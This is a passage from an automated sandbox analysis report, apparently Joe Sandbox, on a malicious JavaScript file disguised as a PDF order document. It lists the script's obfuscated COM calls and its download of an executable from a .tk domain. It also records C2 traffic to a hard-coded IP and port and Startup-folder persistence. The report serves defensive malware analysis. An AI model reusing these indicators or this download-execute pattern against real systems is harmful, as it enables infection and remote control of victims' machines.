            Source: Order Specifications PDF.jsArgument value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsArgument value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h17_2_00EE2304
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h17_2_00EE27F7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h17_2_00EE2BC4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h17_2_00EE0CF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h17_2_00EE0CCC
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h17_2_00EE0D08

            Networking

            barindex
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 50.115.174.192 443Jump to behavior
            Source: C:\Windows\System32\wscript.exeDomain query: tgc8x.tk
            Source: TrafficSnort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.2.6:58595 -> 8.8.8.8:53
            Source: Order Specifications PDF.jsReturn value : ['uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['"MSXML2.XMLHTTP"', '"Send"']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['"Send"']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
            Source: Malware configuration extractorURLs: 51.75.209.245
            Source: Joe Sandbox ViewASN Name: VIRPUS VIRPUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 50.115.174.192 50.115.174.192
            Source: Joe Sandbox ViewIP Address: 51.75.209.245 51.75.209.245
            Source: global trafficHTTP traffic detected: GET /tt/VNZVNCXKKJSF.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tgc8x.tkConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.2.6:49711 -> 51.75.209.245:2404
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: unknownTCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: VNZVNCXKKJSF.exe, 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drString found in binary or memory: http://ocsp.digicert.com0
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000000B.00000002.631988238.0000000004981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.787409928.0000000004AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000000B.00000003.544975348.0000000007A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000003.422336370.0000000007A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micros
